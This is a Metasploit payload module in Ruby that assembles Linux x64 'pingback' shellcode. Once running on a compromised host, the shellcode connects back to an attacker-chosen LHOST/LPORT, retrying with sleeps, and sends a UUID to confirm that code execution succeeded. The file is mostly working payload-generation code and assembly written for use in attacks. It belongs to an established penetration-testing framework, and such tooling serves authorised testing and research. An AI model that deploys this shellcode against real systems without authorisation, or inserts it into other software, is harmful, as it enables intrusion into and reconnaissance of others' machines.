GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/payloads/singles/linux/x64/pingback_reverse_tcp.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
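module MetasploitModule

  # Byte length of the assembled stub. The framework's payload cache compares
  # the generated bytes against this, so any change to the assembly below
  # must be accompanied by an updated value.
  CachedSize = 125

  include Msf::Payload::Linux
  include Msf::Payload::Single
  include Msf::Payload::Pingback
  include Msf::Payload::Pingback::Options

  # Registers the payload's metadata with the framework.
  #
  # @param info [Hash] module info merged over the defaults given here
  def initialize(info = {})
    super(merge_info(info,
      'Name' => 'Linux x64 Pingback, Reverse TCP Inline',
      'Description' => 'Connect back to attacker and report UUID (Linux x64)',
      'Author' => [ 'bwatters-r7' ],
      'License' => MSF_LICENSE,
      'Platform' => 'linux',
      'Arch' => ARCH_X64,
      'Handler' => Msf::Handler::ReverseTcp,
      'Session' => Msf::Sessions::Pingback
    ))
  end

  # Assembles the pingback stub for the current datastore.
  #
  # `generate` is a module-level method (a sibling of `initialize`), so it
  # exists on the module as soon as it is loaded rather than only after an
  # instance has been constructed.
  #
  # @param opts [Hash] unused; retained for the framework's generate(opts)
  #   calling convention
  # @return [String] the raw assembled shellcode bytes
  def generate(opts = {})
    # LPORT is packed little-endian ("v") next to AF_INET (2) packed
    # big-endian ("n"), and the four bytes are re-read as one big-endian
    # word ("N"). Once the combined 64-bit immediate is pushed below, memory
    # reads 02 00 <port hi> <port lo> <LHOST bytes>: a sockaddr_in whose
    # sin_family is host order and whose sin_port is network order.
    # 22 -> "0x00,0x16"
    # 4444 -> "0x11,0x5c"
    # An unset LPORT yields nil.to_i == 0 here; the option layer is expected
    # to supply a default.
    encoded_port = [datastore['LPORT'].to_i, 2].pack("vn").unpack("N").first
    # 127.127.127.127 is only a placeholder used when LHOST is unset.
    encoded_host = Rex::Socket.addr_aton(datastore['LHOST'] || "127.127.127.127").unpack("V").first
    encoded_host_port = "0x%.8x%.8x" % [encoded_host, encoded_port]
    # r9 is decremented before the zero test in handle_failure, so a count of
    # 0 would wrap and never terminate; clamp to at least one attempt.
    retry_count = [datastore['ReverseConnectRetries'].to_i, 1].max

    # Render the UUID hex string as a comma-separated `db` byte list.
    self.pingback_uuid ||= self.generate_pingback_uuid
    uuid_as_db = "0x" + self.pingback_uuid.chars.each_slice(2).map(&:join).join(",0x")
    # Delay between connect attempts, split into the two timespec fields.
    seconds = 5.0
    sleep_seconds = seconds.to_i
    sleep_nanoseconds = (seconds % 1 * 1_000_000_000).to_i

    asm = %Q^
      push #{retry_count} ; retry counter
      pop r9
      push rsi
      push rax
      push 0x29
      pop rax
      cdq
      push 0x2
      pop rdi
      push 0x1
      pop rsi
      syscall ; socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
      test rax, rax
      js failed

      xchg rdi, rax

      connect:
      mov rcx, #{encoded_host_port}
      push rcx
      mov rsi, rsp
      push 0x10
      pop rdx
      push 0x2a
      pop rax
      syscall ; connect(3, {sa_family=AF_INET, LPORT, LHOST, 16)
      pop rcx
      test rax, rax
      jns send_pingback

      handle_failure:
      dec r9
      jz failed
      push rdi
      push 0x23
      pop rax
      push 0x#{sleep_nanoseconds.to_s(16)}
      push 0x#{sleep_seconds.to_s(16)}
      mov rdi, rsp
      xor rsi, rsi
      syscall ; sys_nanosleep
      pop rcx
      pop rcx
      pop rdi
      test rax, rax
      jns connect

      failed:
      push 0x3c
      pop rax
      push 0x1
      pop rdi
      syscall ; exit(1)

      send_pingback:
      push #{uuid_as_db.split(",").length} ; length of the PINGBACK UUID
      pop rdx
      call get_uuid_address ; put uuid buffer on the stack
      db #{uuid_as_db} ; PINGBACK_UUID

      get_uuid_address:
      pop rsi ; UUID address
      xor rax, rax
      inc rax
      syscall ; sys_write

      jmp failed
    ^
    Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string
  end
end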